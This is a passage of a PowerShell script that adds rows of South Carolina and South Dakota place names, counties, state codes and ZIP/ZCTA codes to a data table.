$null = $Cities.Rows.Add("Zcta 292hh","Lexington","South carolina","SC","45","292HH") + $null = $Cities.Rows.Add("Zcta 292xx","Richland","South carolina","SC","45","292XX") + $null = $Cities.Rows.Add("Spartanburg","Spartanburg","South carolina","SC","45","29301") + $null = $Cities.Rows.Add("Spartanburg","Spartanburg","South carolina","SC","45","29302") + $null = $Cities.Rows.Add("Valley falls","Spartanburg","South carolina","SC","45","29303") + $null = $Cities.Rows.Add("Spartanburg","Spartanburg","South carolina","SC","45","29306") + $null = $Cities.Rows.Add("Spartanburg","Spartanburg","South carolina","SC","45","29307") + $null = $Cities.Rows.Add("Spartanburg","Spartanburg","South carolina","SC","45","29316") + $null = $Cities.Rows.Add("Arcadia","Spartanburg","South carolina","SC","45","29320") + $null = $Cities.Rows.Add("Buffalo","Union","South carolina","SC","45","29321") + $null = $Cities.Rows.Add("Campobello","Spartanburg","South carolina","SC","45","29322") + $null = $Cities.Rows.Add("Chesnee","Spartanburg","South carolina","SC","45","29323") + $null = $Cities.Rows.Add("Clinton","Laurens","South carolina","SC","45","29325") + $null = $Cities.Rows.Add("Cowpens","Spartanburg","South carolina","SC","45","29330") + $null = $Cities.Rows.Add("Cross hill","Laurens","South carolina","SC","45","29332") + $null = $Cities.Rows.Add("Duncan","Spartanburg","South carolina","SC","45","29334") + $null = $Cities.Rows.Add("Enoree","Spartanburg","South carolina","SC","45","29335") + $null = $Cities.Rows.Add("Fingerville","Spartanburg","South carolina","SC","45","29338") + $null = $Cities.Rows.Add("Gaffney","Cherokee","South carolina","SC","45","29340") + $null = $Cities.Rows.Add("Gaffney","Cherokee","South carolina","SC","45","29341") + $null = $Cities.Rows.Add("Inman","Spartanburg","South carolina","SC","45","29349") + $null = $Cities.Rows.Add("Joanna","Laurens","South carolina","SC","45","29351") + $null = $Cities.Rows.Add("Kelton","Union","South carolina","SC","45","29353") + $null = $Cities.Rows.Add("Kinards","Newberry","South carolina","SC","45","29355") + $null = $Cities.Rows.Add("Landrum","Spartanburg","South carolina","SC","45","29356") + $null = $Cities.Rows.Add("Ora","Laurens","South carolina","SC","45","29360") + $null = $Cities.Rows.Add("Lockhart","Union","South carolina","SC","45","29364") + $null = $Cities.Rows.Add("Lyman","Spartanburg","South carolina","SC","45","29365") + $null = $Cities.Rows.Add("Moore","Spartanburg","South carolina","SC","45","29369") + $null = $Cities.Rows.Add("Mountville","Laurens","South carolina","SC","45","29370") + $null = $Cities.Rows.Add("Pacolet","Spartanburg","South carolina","SC","45","29372") + $null = $Cities.Rows.Add("Pacolet mills","Spartanburg","South carolina","SC","45","29373") + $null = $Cities.Rows.Add("Glenn springs","Spartanburg","South carolina","SC","45","29374") + $null = $Cities.Rows.Add("Reidville","Spartanburg","South carolina","SC","45","29375") + $null = $Cities.Rows.Add("Roebuck","Spartanburg","South carolina","SC","45","29376") + $null = $Cities.Rows.Add("Startex","Spartanburg","South carolina","SC","45","29377") + $null = $Cities.Rows.Add("Union","Union","South carolina","SC","45","29379") + $null = $Cities.Rows.Add("Waterloo","Laurens","South carolina","SC","45","29384") + $null = $Cities.Rows.Add("Wellford","Spartanburg","South carolina","SC","45","29385") + $null = $Cities.Rows.Add("Woodruff","Spartanburg","South carolina","SC","45","29388") + $null = $Cities.Rows.Add("Zcta 293hh","Cherokee","South carolina","SC","45","293HH") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29401") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29403") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29404") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29405") + $null = $Cities.Rows.Add("North charleston","Charleston","South carolina","SC","45","29406") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29407") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29412") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29414") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29418") + $null = $Cities.Rows.Add("Charleston","Dorchester","South carolina","SC","45","29420") + $null = $Cities.Rows.Add("Charleston","Charleston","South carolina","SC","45","29423") + $null = $Cities.Rows.Add("Jericho","Charleston","South carolina","SC","45","29426") + $null = $Cities.Rows.Add("Awendaw","Charleston","South carolina","SC","45","29429") + $null = $Cities.Rows.Add("Bethera","Berkeley","South carolina","SC","45","29430") + $null = $Cities.Rows.Add("Bonneau","Berkeley","South carolina","SC","45","29431") + $null = $Cities.Rows.Add("Branchville","Orangeburg","South carolina","SC","45","29432") + $null = $Cities.Rows.Add("Cordesville","Berkeley","South carolina","SC","45","29434") + $null = $Cities.Rows.Add("Cottageville","Colleton","South carolina","SC","45","29435") + $null = $Cities.Rows.Add("Cross","Berkeley","South carolina","SC","45","29436") + $null = $Cities.Rows.Add("Dorchester","Dorchester","South carolina","SC","45","29437") + $null = $Cities.Rows.Add("Edisto island","Charleston","South carolina","SC","45","29438") + $null = $Cities.Rows.Add("Folly beach","Charleston","South carolina","SC","45","29439") + $null = $Cities.Rows.Add("Georgetown","Georgetown","South carolina","SC","45","29440") + $null = $Cities.Rows.Add("Mount holly","Berkeley","South carolina","SC","45","29445") + $null = $Cities.Rows.Add("Green pond","Colleton","South carolina","SC","45","29446") + $null = $Cities.Rows.Add("Harleyville","Dorchester","South carolina","SC","45","29448") + $null = $Cities.Rows.Add("Meggett","Charleston","South carolina","SC","45","29449") + $null = $Cities.Rows.Add("Huger","Berkeley","South carolina","SC","45","29450") + $null = $Cities.Rows.Add("Isle of palms","Charleston","South carolina","SC","45","29451") + $null = $Cities.Rows.Add("Jacksonboro","Colleton","South carolina","SC","45","29452") + $null = $Cities.Rows.Add("Shulerville","Berkeley","South carolina","SC","45","29453") + $null = $Cities.Rows.Add("Johns island","Charleston","South carolina","SC","45","29455") + $null = $Cities.Rows.Add("Ladson","Berkeley","South carolina","SC","45","29456") + $null = $Cities.Rows.Add("Mc clellanville","Charleston","South carolina","SC","45","29458") + $null = $Cities.Rows.Add("Oakley","Berkeley","South carolina","SC","45","29461") + $null = $Cities.Rows.Add("Mount pleasant","Charleston","South carolina","SC","45","29464") + $null = $Cities.Rows.Add("Zcta 29466","Charleston","South carolina","SC","45","29466") + $null = $Cities.Rows.Add("Pineville","Berkeley","South carolina","SC","45","29468") + $null = $Cities.Rows.Add("Pinopolis","Berkeley","South carolina","SC","45","29469") + $null = $Cities.Rows.Add("Ravenel","Charleston","South carolina","SC","45","29470") + $null = $Cities.Rows.Add("Reevesville","Dorchester","South carolina","SC","45","29471") + $null = $Cities.Rows.Add("Ridgeville","Dorchester","South carolina","SC","45","29472") + $null = $Cities.Rows.Add("Round o","Colleton","South carolina","SC","45","29474") + $null = $Cities.Rows.Add("Ruffin","Colleton","South carolina","SC","45","29475") + $null = $Cities.Rows.Add("Saint george","Dorchester","South carolina","SC","45","29477") + $null = $Cities.Rows.Add("Alvin","Berkeley","South carolina","SC","45","29479") + $null = $Cities.Rows.Add("Smoaks","Colleton","South carolina","SC","45","29481") + $null = $Cities.Rows.Add("Sullivans island","Charleston","South carolina","SC","45","29482") + $null = $Cities.Rows.Add("Summerville","Dorchester","South carolina","SC","45","29483") + $null = $Cities.Rows.Add("Summerville","Dorchester","South carolina","SC","45","29485") + $null = $Cities.Rows.Add("Wadmalaw island","Charleston","South carolina","SC","45","29487") + $null = $Cities.Rows.Add("Ritter","Colleton","South carolina","SC","45","29488") + $null = $Cities.Rows.Add("Wando","Berkeley","South carolina","SC","45","29492") + $null = $Cities.Rows.Add("Williams","Colleton","South carolina","SC","45","29493") + $null = $Cities.Rows.Add("Zcta 294hh","Berkeley","South carolina","SC","45","294HH") + $null = $Cities.Rows.Add("Zcta 294xx","Berkeley","South carolina","SC","45","294XX") + $null = $Cities.Rows.Add("Florence","Florence","South carolina","SC","45","29501") + $null = $Cities.Rows.Add("Florence","Florence","South carolina","SC","45","29505") + $null = $Cities.Rows.Add("Quinby","Florence","South carolina","SC","45","29506") + $null = $Cities.Rows.Add("Andrews","Georgetown","South carolina","SC","45","29510") + $null = $Cities.Rows.Add("Aynor","Horry","South carolina","SC","45","29511") + $null = $Cities.Rows.Add("Bennettsville","Marlboro","South carolina","SC","45","29512") + $null = $Cities.Rows.Add("Blenheim","Marlboro","South carolina","SC","45","29516") + $null = $Cities.Rows.Add("Cades","Williamsburg","South carolina","SC","45","29518") + $null = $Cities.Rows.Add("Centenary","Marion","South carolina","SC","45","29519") + $null = $Cities.Rows.Add("Cheraw","Chesterfield","South carolina","SC","45","29520") + $null = $Cities.Rows.Add("Clio","Marlboro","South carolina","SC","45","29525") + $null = $Cities.Rows.Add("Conway","Horry","South carolina","SC","45","29526") + $null = $Cities.Rows.Add("Bucksport","Horry","South carolina","SC","45","29527") + $null = $Cities.Rows.Add("Coward","Florence","South carolina","SC","45","29530") + $null = $Cities.Rows.Add("Darlington","Darlington","South carolina","SC","45","29532") + $null = $Cities.Rows.Add("Dillon","Dillon","South carolina","SC","45","29536") + $null = $Cities.Rows.Add("Darlington","Darlington","South carolina","SC","45","29540") + $null = $Cities.Rows.Add("Effingham","Florence","South carolina","SC","45","29541") + $null = $Cities.Rows.Add("Fork","Dillon","South carolina","SC","45","29543") + $null = $Cities.Rows.Add("Galivants ferry","Horry","South carolina","SC","45","29544") + $null = $Cities.Rows.Add("Green sea","Horry","South carolina","SC","45","29545") + $null = $Cities.Rows.Add("Gresham","Marion","South carolina","SC","45","29546") + $null = $Cities.Rows.Add("South of the bor","Dillon","South carolina","SC","45","29547") + $null = $Cities.Rows.Add("Hartsville","Darlington","South carolina","SC","45","29550") + $null = $Cities.Rows.Add("Hemingway","Williamsburg","South carolina","SC","45","29554") + $null = $Cities.Rows.Add("Johnsonville","Florence","South carolina","SC","45","29555") + $null = $Cities.Rows.Add("Kingstree","Williamsburg","South carolina","SC","45","29556") + $null = $Cities.Rows.Add("Lake city","Florence","South carolina","SC","45","29560") + $null = $Cities.Rows.Add("Lake view","Dillon","South carolina","SC","45","29563") + $null = $Cities.Rows.Add("Lane","Williamsburg","South carolina","SC","45","29564") + $null = $Cities.Rows.Add("Latta","Dillon","South carolina","SC","45","29565") + $null = $Cities.Rows.Add("Little river","Horry","South carolina","SC","45","29566") + $null = $Cities.Rows.Add("Little rock","Dillon","South carolina","SC","45","29567") + $null = $Cities.Rows.Add("Longs","Horry","South carolina","SC","45","29568") + $null = $Cities.Rows.Add("Loris","Horry","South carolina","SC","45","29569") + $null = $Cities.Rows.Add("Mc coll","Marlboro","South carolina","SC","45","29570") + $null = $Cities.Rows.Add("Marion","Marion","South carolina","SC","45","29571") + $null = $Cities.Rows.Add("Myrtle beach","Horry","South carolina","SC","45","29572") + $null = $Cities.Rows.Add("Mullins","Marion","South carolina","SC","45","29574") + $null = $Cities.Rows.Add("Surfside beach","Horry","South carolina","SC","45","29575") + $null = $Cities.Rows.Add("Murrells inlet","Horry","South carolina","SC","45","29576") + $null = $Cities.Rows.Add("Myrtle beach","Horry","South carolina","SC","45","29577") + $null = $Cities.Rows.Add("Myrtle beach afb","Horry","South carolina","SC","45","29579") + $null = $Cities.Rows.Add("Nesmith","Williamsburg","South carolina","SC","45","29580") + $null = $Cities.Rows.Add("Nichols","Horry","South carolina","SC","45","29581") + $null = $Cities.Rows.Add("Cherry grove bea","Horry","South carolina","SC","45","29582") + $null = $Cities.Rows.Add("Pamplico","Florence","South carolina","SC","45","29583") + $null = $Cities.Rows.Add("Patrick","Chesterfield","South carolina","SC","45","29584") + $null = $Cities.Rows.Add("Pawleys island","Georgetown","South carolina","SC","45","29585") + $null = $Cities.Rows.Add("Rains","Marion","South carolina","SC","45","29589") + $null = $Cities.Rows.Add("Salters","Williamsburg","South carolina","SC","45","29590") + $null = $Cities.Rows.Add("Scranton","Florence","South carolina","SC","45","29591") + $null = $Cities.Rows.Add("Sellers","Dillon","South carolina","SC","45","29592") + $null = $Cities.Rows.Add("Society hill","Darlington","South carolina","SC","45","29593") + $null = $Cities.Rows.Add("Tatum","Marlboro","South carolina","SC","45","29594") + $null = $Cities.Rows.Add("Wallace","Marlboro","South carolina","SC","45","29596") + $null = $Cities.Rows.Add("Zcta 295hh","Chesterfield","South carolina","SC","45","295HH") + $null = $Cities.Rows.Add("Zcta 295xx","Williamsburg","South carolina","SC","45","295XX") + $null = $Cities.Rows.Add("Greenville","Greenville","South carolina","SC","45","29601") + $null = $Cities.Rows.Add("Greenville","Greenville","South carolina","SC","45","29605") + $null = $Cities.Rows.Add("Greenville","Greenville","South carolina","SC","45","29607") + $null = $Cities.Rows.Add("Greenville","Greenville","South carolina","SC","45","29609") + $null = $Cities.Rows.Add("Greenville","Greenville","South carolina","SC","45","29611") + $null = $Cities.Rows.Add("Greenville","Greenville","South carolina","SC","45","29615") + $null = $Cities.Rows.Add("Zcta 29617","Greenville","South carolina","SC","45","29617") + $null = $Cities.Rows.Add("Abbeville","Abbeville","South carolina","SC","45","29620") + $null = $Cities.Rows.Add("Anderson","Anderson","South carolina","SC","45","29621") + $null = $Cities.Rows.Add("Anderson","Anderson","South carolina","SC","45","29624") + $null = $Cities.Rows.Add("Anderson","Anderson","South carolina","SC","45","29625") + $null = $Cities.Rows.Add("Zcta 29626","Anderson","South carolina","SC","45","29626") + $null = $Cities.Rows.Add("Belton","Anderson","South carolina","SC","45","29627") + $null = $Cities.Rows.Add("Calhoun falls","Abbeville","South carolina","SC","45","29628") + $null = $Cities.Rows.Add("Central","Pickens","South carolina","SC","45","29630") + $null = $Cities.Rows.Add("Clemson","Pickens","South carolina","SC","45","29631") + $null = $Cities.Rows.Add("Cleveland","Greenville","South carolina","SC","45","29635") + $null = $Cities.Rows.Add("Shoals junction","Abbeville","South carolina","SC","45","29638") + $null = $Cities.Rows.Add("Due west","Abbeville","South carolina","SC","45","29639") + $null = $Cities.Rows.Add("Easley","Pickens","South carolina","SC","45","29640") + $null = $Cities.Rows.Add("Easley","Pickens","South carolina","SC","45","29642") + $null = $Cities.Rows.Add("Fair play","Oconee","South carolina","SC","45","29643") + $null = $Cities.Rows.Add("Fountain inn","Greenville","South carolina","SC","45","29644") + $null = $Cities.Rows.Add("Ora","Laurens","South carolina","SC","45","29645") + $null = $Cities.Rows.Add("Greenwood","Greenwood","South carolina","SC","45","29646") + $null = $Cities.Rows.Add("Greenwood","Greenwood","South carolina","SC","45","29649") + $null = $Cities.Rows.Add("Greer","Greenville","South carolina","SC","45","29650") + $null = $Cities.Rows.Add("Greer","Greenville","South carolina","SC","45","29651") + $null = $Cities.Rows.Add("Hodges","Greenwood","South carolina","SC","45","29653") + $null = $Cities.Rows.Add("Honea path","Anderson","South carolina","SC","45","29654") + $null = $Cities.Rows.Add("Iva","Anderson","South carolina","SC","45","29655") + $null = $Cities.Rows.Add("La france","Anderson","South carolina","SC","45","29656") + $null = $Cities.Rows.Add("Liberty","Pickens","South carolina","SC","45","29657") + $null = $Cities.Rows.Add("Long creek","Oconee","South carolina","SC","45","29658") + $null = $Cities.Rows.Add("Lowndesville","Abbeville","South carolina","SC","45","29659") + $null = $Cities.Rows.Add("Marietta","Greenville","South carolina","SC","45","29661") + $null = $Cities.Rows.Add("Mauldin","Greenville","South carolina","SC","45","29662") + $null = $Cities.Rows.Add("Mountain rest","Oconee","South carolina","SC","45","29664") + $null = $Cities.Rows.Add("Newry","Oconee","South carolina","SC","45","29665") + $null = $Cities.Rows.Add("Ninety six","Greenwood","South carolina","SC","45","29666") + $null = $Cities.Rows.Add("Cateechee","Pickens","South carolina","SC","45","29667") + $null = $Cities.Rows.Add("Pelzer","Anderson","South carolina","SC","45","29669") + $null = $Cities.Rows.Add("Pendleton","Anderson","South carolina","SC","45","29670") + $null = $Cities.Rows.Add("Pickens","Pickens","South carolina","SC","45","29671") + $null = $Cities.Rows.Add("Zcta 29672","Oconee","South carolina","SC","45","29672") + $null = $Cities.Rows.Add("Piedmont","Greenville","South carolina","SC","45","29673") + $null = $Cities.Rows.Add("Salem","Oconee","South carolina","SC","45","29676") + $null = $Cities.Rows.Add("Sandy springs","Anderson","South carolina","SC","45","29677") + $null = $Cities.Rows.Add("Seneca","Oconee","South carolina","SC","45","29678") + $null = $Cities.Rows.Add("Zcta 29680","Greenville","South carolina","SC","45","29680") + $null = $Cities.Rows.Add("Simpsonville","Greenville","South carolina","SC","45","29681") + $null = $Cities.Rows.Add("Six mile","Pickens","South carolina","SC","45","29682") + $null = $Cities.Rows.Add("Slater","Greenville","South carolina","SC","45","29683") + $null = $Cities.Rows.Add("Starr","Anderson","South carolina","SC","45","29684") + $null = $Cities.Rows.Add("Sunset","Pickens","South carolina","SC","45","29685") + $null = $Cities.Rows.Add("Tamassee","Oconee","South carolina","SC","45","29686") + $null = $Cities.Rows.Add("Taylors","Greenville","South carolina","SC","45","29687") + $null = $Cities.Rows.Add("Tigerville","Greenville","South carolina","SC","45","29688") + $null = $Cities.Rows.Add("Townville","Anderson","South carolina","SC","45","29689") + $null = $Cities.Rows.Add("Travelers rest","Greenville","South carolina","SC","45","29690") + $null = $Cities.Rows.Add("Walhalla","Oconee","South carolina","SC","45","29691") + $null = $Cities.Rows.Add("Ware shoals","Greenwood","South carolina","SC","45","29692") + $null = $Cities.Rows.Add("Madison","Oconee","South carolina","SC","45","29693") + $null = $Cities.Rows.Add("West union","Oconee","South carolina","SC","45","29696") + $null = $Cities.Rows.Add("Williamston","Anderson","South carolina","SC","45","29697") + $null = $Cities.Rows.Add("Zcta 296hh","Abbeville","South carolina","SC","45","296HH") + $null = $Cities.Rows.Add("Cherokee falls","Cherokee","South carolina","SC","45","29702") + $null = $Cities.Rows.Add("Catawba","York","South carolina","SC","45","29704") + $null = $Cities.Rows.Add("Chester","Chester","South carolina","SC","45","29706") + $null = $Cities.Rows.Add("Zcta 29708","York","South carolina","SC","45","29708") + $null = $Cities.Rows.Add("Chesterfield","Chesterfield","South carolina","SC","45","29709") + $null = $Cities.Rows.Add("Lake wylie","York","South carolina","SC","45","29710") + $null = $Cities.Rows.Add("Edgemoor","Chester","South carolina","SC","45","29712") + $null = $Cities.Rows.Add("Fort lawn","Chester","South carolina","SC","45","29714") + $null = $Cities.Rows.Add("Tega cay","York","South carolina","SC","45","29715") + $null = $Cities.Rows.Add("Hickory grove","York","South carolina","SC","45","29717") + $null = $Cities.Rows.Add("Jefferson","Chesterfield","South carolina","SC","45","29718") + $null = $Cities.Rows.Add("Lancaster","Lancaster","South carolina","SC","45","29720") + $null = $Cities.Rows.Add("Lando","Chester","South carolina","SC","45","29724") + $null = $Cities.Rows.Add("Mc connells","York","South carolina","SC","45","29726") + $null = $Cities.Rows.Add("Mount croghan","Chesterfield","South carolina","SC","45","29727") + $null = $Cities.Rows.Add("Pageland","Chesterfield","South carolina","SC","45","29728") + $null = $Cities.Rows.Add("Richburg","Chester","South carolina","SC","45","29729") + $null = $Cities.Rows.Add("Rock hill","York","South carolina","SC","45","29730") + $null = $Cities.Rows.Add("Rock hill","York","South carolina","SC","45","29732") + $null = $Cities.Rows.Add("Ruby","Chesterfield","South carolina","SC","45","29741") + $null = $Cities.Rows.Add("Sharon","York","South carolina","SC","45","29742") + $null = $Cities.Rows.Add("Smyrna","York","South carolina","SC","45","29743") + $null = $Cities.Rows.Add("York","York","South carolina","SC","45","29745") + $null = $Cities.Rows.Add("Zcta 297hh","Cherokee","South carolina","SC","45","297HH") + $null = $Cities.Rows.Add("Aiken","Aiken","South carolina","SC","45","29801") + $null = $Cities.Rows.Add("Aiken","Aiken","South carolina","SC","45","29803") + $null = $Cities.Rows.Add("Zcta 29805","Aiken","South carolina","SC","45","29805") + $null = $Cities.Rows.Add("New ellenton","Aiken","South carolina","SC","45","29809") + $null = $Cities.Rows.Add("Allendale","Allendale","South carolina","SC","45","29810") + $null = $Cities.Rows.Add("Barnwell","Barnwell","South carolina","SC","45","29812") + $null = $Cities.Rows.Add("Bath","Aiken","South carolina","SC","45","29816") + $null = $Cities.Rows.Add("Blackville","Barnwell","South carolina","SC","45","29817") + $null = $Cities.Rows.Add("Bradley","Greenwood","South carolina","SC","45","29819") + $null = $Cities.Rows.Add("Clarks hill","McCormick","South carolina","SC","45","29821") + $null = $Cities.Rows.Add("Clearwater","Aiken","South carolina","SC","45","29822") + $null = $Cities.Rows.Add("Edgefield","Edgefield","South carolina","SC","45","29824") + $null = $Cities.Rows.Add("Elko","Barnwell","South carolina","SC","45","29826") + $null = $Cities.Rows.Add("Fairfax","Allendale","South carolina","SC","45","29827") + $null = $Cities.Rows.Add("Gloverville","Aiken","South carolina","SC","45","29828") + $null = $Cities.Rows.Add("Graniteville","Aiken","South carolina","SC","45","29829") + $null = $Cities.Rows.Add("Jackson","Aiken","South carolina","SC","45","29831") + $null = $Cities.Rows.Add("Johnston","Edgefield","South carolina","SC","45","29832") + $null = $Cities.Rows.Add("Langley","Aiken","South carolina","SC","45","29834") + $null = $Cities.Rows.Add("Mc cormick","McCormick","South carolina","SC","45","29835") + $null = $Cities.Rows.Add("Martin","Allendale","South carolina","SC","45","29836") + $null = $Cities.Rows.Add("Modoc","McCormick","South carolina","SC","45","29838") + $null = $Cities.Rows.Add("Mount carmel","McCormick","South carolina","SC","45","29840") + $null = $Cities.Rows.Add("Beech island","Aiken","South carolina","SC","45","29841") + $null = $Cities.Rows.Add("Beech island","Aiken","South carolina","SC","45","29842") + $null = $Cities.Rows.Add("Olar","Bamberg","South carolina","SC","45","29843") + $null = $Cities.Rows.Add("Parksville","McCormick","South carolina","SC","45","29844") + $null = $Cities.Rows.Add("Plum branch","McCormick","South carolina","SC","45","29845") + $null = $Cities.Rows.Add("Sycamore","Allendale","South carolina","SC","45","29846") + $null = $Cities.Rows.Add("Trenton","Edgefield","South carolina","SC","45","29847") + $null = $Cities.Rows.Add("Troy","Greenwood","South carolina","SC","45","29848") + $null = $Cities.Rows.Add("Ulmer","Allendale","South carolina","SC","45","29849") + $null = $Cities.Rows.Add("Vaucluse","Aiken","South carolina","SC","45","29850") + $null = $Cities.Rows.Add("Warrenville","Aiken","South carolina","SC","45","29851") + $null = $Cities.Rows.Add("Williston","Barnwell","South carolina","SC","45","29853") + $null = $Cities.Rows.Add("Windsor","Aiken","South carolina","SC","45","29856") + $null = $Cities.Rows.Add("Zcta 29860","Edgefield","South carolina","SC","45","29860") + $null = $Cities.Rows.Add("Zcta 298hh","Aiken","South carolina","SC","45","298HH") + $null = $Cities.Rows.Add("Zcta 298xx","Aiken","South carolina","SC","45","298XX") + $null = $Cities.Rows.Add("Burton","Beaufort","South carolina","SC","45","29902") + $null = $Cities.Rows.Add("Zcta 29906","Beaufort","South carolina","SC","45","29906") + $null = $Cities.Rows.Add("Bluffton","Beaufort","South carolina","SC","45","29910") + $null = $Cities.Rows.Add("Brunson","Hampton","South carolina","SC","45","29911") + $null = $Cities.Rows.Add("Early branch","Hampton","South carolina","SC","45","29916") + $null = $Cities.Rows.Add("Estill","Hampton","South carolina","SC","45","29918") + $null = $Cities.Rows.Add("St helena island","Beaufort","South carolina","SC","45","29920") + $null = $Cities.Rows.Add("Furman","Hampton","South carolina","SC","45","29921") + $null = $Cities.Rows.Add("Garnett","Jasper","South carolina","SC","45","29922") + $null = $Cities.Rows.Add("Gifford","Hampton","South carolina","SC","45","29923") + $null = $Cities.Rows.Add("Hampton","Hampton","South carolina","SC","45","29924") + $null = $Cities.Rows.Add("Hilton head isla","Beaufort","South carolina","SC","45","29926") + $null = $Cities.Rows.Add("Hardeeville","Jasper","South carolina","SC","45","29927") + $null = $Cities.Rows.Add("Hilton head isla","Beaufort","South carolina","SC","45","29928") + $null = $Cities.Rows.Add("Islandton","Colleton","South carolina","SC","45","29929") + $null = $Cities.Rows.Add("Luray","Hampton","South carolina","SC","45","29932") + $null = $Cities.Rows.Add("Pineland","Jasper","South carolina","SC","45","29934") + $null = $Cities.Rows.Add("Port royal","Beaufort","South carolina","SC","45","29935") + $null = $Cities.Rows.Add("Coosawatchie","Jasper","South carolina","SC","45","29936") + $null = $Cities.Rows.Add("Scotia","Hampton","South carolina","SC","45","29939") + $null = $Cities.Rows.Add("Seabrook","Beaufort","South carolina","SC","45","29940") + $null = $Cities.Rows.Add("Sheldon","Beaufort","South carolina","SC","45","29941") + $null = $Cities.Rows.Add("Tillman","Jasper","South carolina","SC","45","29943") + $null = $Cities.Rows.Add("Varnville","Hampton","South carolina","SC","45","29944") + $null = $Cities.Rows.Add("Yemassee","Colleton","South carolina","SC","45","29945") + $null = $Cities.Rows.Add("Zcta 299hh","Beaufort","South carolina","SC","45","299HH") + $null = $Cities.Rows.Add("Zcta 299xx","Jasper","South carolina","SC","45","299XX") + $null = $Cities.Rows.Add("","Roberts","South dakota","SD","46","56219") + $null = $Cities.Rows.Add("","Roberts","South dakota","SD","46","562HH") + $null = $Cities.Rows.Add("Alcester","Union","South dakota","SD","46","57001") + $null = $Cities.Rows.Add("Aurora","Brookings","South dakota","SD","46","57002") + $null = $Cities.Rows.Add("Baltic","Minnehaha","South dakota","SD","46","57003") + $null = $Cities.Rows.Add("Beresford","Union","South dakota","SD","46","57004") + $null = $Cities.Rows.Add("Corson","Minnehaha","South dakota","SD","46","57005") + $null = $Cities.Rows.Add("Brookings","Brookings","South dakota","SD","46","57006") + $null = $Cities.Rows.Add("Burbank","Clay","South dakota","SD","46","57010") + $null = $Cities.Rows.Add("Canistota","McCook","South dakota","SD","46","57012") + $null = $Cities.Rows.Add("Canton","Lincoln","South dakota","SD","46","57013") + $null = $Cities.Rows.Add("Centerville","Turner","South dakota","SD","46","57014") + $null = $Cities.Rows.Add("Chancellor","Turner","South dakota","SD","46","57015") + $null = $Cities.Rows.Add("Chester","Lake","South dakota","SD","46","57016") + $null = $Cities.Rows.Add("Colman","Moody","South dakota","SD","46","57017") + $null = $Cities.Rows.Add("Colton","Minnehaha","South dakota","SD","46","57018") + $null = $Cities.Rows.Add("Crooks","Minnehaha","South dakota","SD","46","57020") + $null = $Cities.Rows.Add("Davis","Turner","South dakota","SD","46","57021") + $null = $Cities.Rows.Add("Dell rapids","Minnehaha","South dakota","SD","46","57022") + $null = $Cities.Rows.Add("Egan","Moody","South dakota","SD","46","57024") + $null = $Cities.Rows.Add("Elk point","Union","South dakota","SD","46","57025") + $null = $Cities.Rows.Add("Elkton","Brookings","South dakota","SD","46","57026") + $null = $Cities.Rows.Add("Fairview","Lincoln","South dakota","SD","46","57027") + $null = $Cities.Rows.Add("Flandreau","Moody","South dakota","SD","46","57028") + $null = $Cities.Rows.Add("Freeman","Hutchinson","South dakota","SD","46","57029") + $null = $Cities.Rows.Add("Garretson","Minnehaha","South dakota","SD","46","57030") + $null = $Cities.Rows.Add("Gayville","Yankton","South dakota","SD","46","57031") + $null = $Cities.Rows.Add("Harrisburg","Lincoln","South dakota","SD","46","57032") + $null = $Cities.Rows.Add("Hartford","Minnehaha","South dakota","SD","46","57033") + $null = $Cities.Rows.Add("Hudson","Lincoln","South dakota","SD","46","57034") + $null = $Cities.Rows.Add("Humboldt","Minnehaha","South dakota","SD","46","57035") + $null = $Cities.Rows.Add("Hurley","Turner","South dakota","SD","46","57036") + $null = $Cities.Rows.Add("Irene","Yankton","South dakota","SD","46","57037") + $null = $Cities.Rows.Add("Jefferson","Union","South dakota","SD","46","57038") + $null = $Cities.Rows.Add("Lennox","Lincoln","South dakota","SD","46","57039") + $null = $Cities.Rows.Add("Lesterville","Yankton","South dakota","SD","46","57040") + $null = $Cities.Rows.Add("Lyons","Minnehaha","South dakota","SD","46","57041") + $null = $Cities.Rows.Add("Madison","Lake","South dakota","SD","46","57042") + $null = $Cities.Rows.Add("Marion","Turner","South dakota","SD","46","57043") + $null = $Cities.Rows.Add("Meckling","Clay","South dakota","SD","46","57044") + $null = $Cities.Rows.Add("Menno","Hutchinson","South dakota","SD","46","57045") + $null = $Cities.Rows.Add("Mission hill","Yankton","South dakota","SD","46","57046") + $null = $Cities.Rows.Add("Monroe","Turner","South dakota","SD","46","57047") + $null = $Cities.Rows.Add("Montrose","McCook","South dakota","SD","46","57048") + $null = $Cities.Rows.Add("Dakota dunes","Union","South dakota","SD","46","57049") + $null = $Cities.Rows.Add("Nunda","Lake","South dakota","SD","46","57050") + $null = $Cities.Rows.Add("Oldham","Kingsbury","South dakota","SD","46","57051") + $null = $Cities.Rows.Add("Olivet","Hutchinson","South dakota","SD","46","57052") + $null = $Cities.Rows.Add("Parker","Turner","South dakota","SD","46","57053") + $null = $Cities.Rows.Add("Ramona","Lake","South dakota","SD","46","57054") + $null = $Cities.Rows.Add("Renner","Minnehaha","South dakota","SD","46","57055") + $null = $Cities.Rows.Add("Rutland","Lake","South dakota","SD","46","57057") + $null = $Cities.Rows.Add("Salem","McCook","South dakota","SD","46","57058") + $null = $Cities.Rows.Add("Scotland","Bon Homme","South dakota","SD","46","57059") + $null = $Cities.Rows.Add("Sinai","Brookings","South dakota","SD","46","57061") + $null = $Cities.Rows.Add("Springfield","Bon Homme","South dakota","SD","46","57062") + $null = $Cities.Rows.Add("Tabor","Bon Homme","South dakota","SD","46","57063") + $null = $Cities.Rows.Add("Tea","Lincoln","South dakota","SD","46","57064") + $null = $Cities.Rows.Add("Trent","Moody","South dakota","SD","46","57065") + $null = $Cities.Rows.Add("Tyndall","Bon Homme","South dakota","SD","46","57066") + $null = $Cities.Rows.Add("Utica","Yankton","South dakota","SD","46","57067") + $null = $Cities.Rows.Add("Valley springs","Minnehaha","South dakota","SD","46","57068") + $null = $Cities.Rows.Add("Vermillion","Clay","South dakota","SD","46","57069") + $null = $Cities.Rows.Add("Viborg","Turner","South dakota","SD","46","57070") + $null = $Cities.Rows.Add("Volga","Brookings","South dakota","SD","46","57071") + $null = $Cities.Rows.Add("Volin","Yankton","South 